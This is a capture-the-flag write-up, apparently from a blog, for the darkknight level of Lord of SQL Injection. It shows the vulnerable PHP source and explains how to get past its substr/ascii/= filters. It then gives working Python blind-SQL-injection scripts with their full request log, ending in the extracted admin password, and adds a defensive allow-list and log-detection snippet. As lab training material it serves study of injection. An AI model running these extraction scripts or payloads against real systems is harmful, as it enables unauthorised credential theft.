[Lord Of SQL Injection] No. 12 (detailed explanation, revised)

Kwon Oh! JUN 2022. 2. 2. 03:24

query : select id from prob_darkknight where id='guest' and pw='' and no=



<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  // blacklist filters on the raw GET parameters; `no` is later interpolated unquoted
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
  if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");
  $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>";

  // second query: the challenge is solved only when the real admin password is submitted
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight");
  highlight_file(__FILE__);
?>

 


*substr and ascii get caught by the filter

 

  $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>";

 

If id, pw and no are all wrong, no row satisfies the condition, so naturally nothing is printed.

An OR expression is true as soon as one of its operands is true. (Operator precedence is AND before OR, so whatever the AND group `id='guest' and pw='' and no=""` evaluates to, 0 or 1, the OR adds a true operand and the whole condition is unconditionally true.)

 

So if you request

https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no=%22%22||%20length(pw)like%228%22 

like this,


query : select id from prob_darkknight where id='guest' and pw='' and no=""|| length(pw)like"8"


 

Hello admin


 

The id, pw and no conditions are false, and `or length(pw)like"8"`, the condition that the password length is 8, is true; since `select id` then points at the row whose id is 'admin', Hello admin is printed.

That is the end of the basic explanation; now, solving the problem...

 

Password length

import requests

url = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php"
cookie = dict(PHPSESSID="쿠키값")  # 쿠키값 = your own PHPSESSID cookie value

# length(pw) like "i" is true only for the row whose password has length i;
# %22 is ", %23 is # (comments out the rest of the query)
for i in range(1,100):
    param = "?no=%22%22|| length(pw)like%22"+str(i)+"%22%23"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie)

    # "Hello admin" appears only when the injected condition is true
    if response.text.find("Hello admin")>0:
        print("password :"+str(i))
        break

 

Matching the password with blind SQL injection

import requests
import string

url = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php"
cookie = dict(PHPSESSID="쿠키값")  # 쿠키값 = your own PHPSESSID cookie value

asc = string.digits+string.ascii_letters  # candidate characters, digits first
result=""

# password length is 8 (found above); test each position against each candidate
for i in range(1,9):
    for j in asc:
        # %09 = tab (whitespace), %26%26 = &&, %23 = # ;
        # right(left(pw,i),1) is the i-th character (substr is filtered),
        # ord() replaces the filtered ascii(), like "N" replaces the filtered =
        param = "?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,"+str(i)+"),1))like%22"+str(ord(j))+"%22%23"
        print(param)
        res_url = url+param
        response = requests.get(res_url, cookies=cookie)

        if response.text.find("Hello admin")>0:
            print(str(i)+"번째 패스워드 :"+j)
            result+=j
            break
print("pw :"+result)

 

*Because substr and ascii are filtered,

substr(pw,1,1) -> right(left(pw,1),1)

ascii() -> ord()

were used to bypass them.

 

?no=""||id like"admin"&&ord(right(left(pw,1),1))like"48"#

Since we are trying to find out the password length for id=admin, id like"admin" has to be set.
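An added example, not from this post or the challenge: the three preg_match blacklists above ported to Python, showing that the payloads quoted in the post pass them while a digits-only allow-list for `no` rejects them, plus the same allow-list applied to request URLs as a log-side detection. The `darkknight.php` path in the sample log and the `STRICT_NO` pattern are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The three preg_match() blacklists from the darkknight source, ported to Python
# (PHP's /i flag becomes re.I; the patterns themselves are unchanged).
NO_FILTER_1 = re.compile(r"prob|_|\.|\(\)", re.I)    # -> exit("No Hack ~_~")
PW_FILTER = re.compile(r"'", re.I)                   # -> exit("HeHe")
NO_FILTER_2 = re.compile(r"'|substr|ascii|=", re.I)  # -> exit("HeHe")


def blacklist_allows(no, pw=""):
    """True if the challenge's blacklist lets the request reach the query."""
    if NO_FILTER_1.search(no) or NO_FILTER_2.search(no):
        return False
    return PW_FILTER.search(pw) is None


# Hardened check (assumption: `no` is a numeric column, so accepting only
# digits is the right validation; a prepared statement belongs alongside it).
STRICT_NO = re.compile(r"[0-9]{1,10}")


def allowlist_allows(no):
    """Reject anything that is not a plain integer: quotes, ||, like, ord/left/right."""
    return STRICT_NO.fullmatch(no) is not None


def flag_request(url):
    """Detection view over an access-log URL: decode the query string the way
    the web server does (%22 -> ", %09 -> tab, %26 -> &) and apply the allow-list."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    no = params.get("no", [""])[0]
    return not allowlist_allows(no)


# Payloads quoted in the post, URL-decoded, plus one the blacklist does catch.
LENGTH_PROBE = '""|| length(pw)like"8"'
CHAR_PROBE = '""||id\tlike"admin"&&ord(right(left(pw,1),1))like"48"#'
CAUGHT = '""|| ascii(substr(pw,1,1))=48'

# Constructed sample of request URLs as they would appear in an access log.
SAMPLE_LOG = [
    "/darkknight.php?no=1",
    "/darkknight.php?no=%22%22||%20length(pw)like%228%22",
    "/darkknight.php?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,1),1))like%2248%22%23",
]


def flagged_lines(log):
    """Indexes of log entries whose `no` parameter fails the allow-list."""
    return [i for i, url in enumerate(log) if flag_request(url)]
```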

 

?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,1),1))like%2248%22%23
1번째 패스워드 :0
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2249%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2250%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2251%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2252%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2253%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2254%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2255%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2256%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2257%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2297%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2298%22%23
2번째 패스워드 :b
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2249%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2250%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2251%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2252%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2253%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2254%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2255%22%23
3번째 패스워드 :7
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,4),1))like%2248%22%23
4번째 패스워드 :0
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2249%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2250%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2251%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2252%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2253%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2254%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2255%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2256%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2257%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2297%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2298%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2299%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%22100%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%22101%22%23
5번째 패스워드 :e
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2249%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2250%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2251%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2252%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2253%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2254%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2255%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2256%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2257%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2297%22%23
6번째 패스워드 :a
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,7),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,7),1))like%2249%22%23
7번째 패스워드 :1
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2249%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2250%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2251%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2252%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2253%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2254%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2255%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2256%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2257%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2297%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2298%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2299%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%22100%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%22101%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%22102%22%23
8번째 패스워드 :f
pw :0b70ea1f

 

 

 

 

 

 
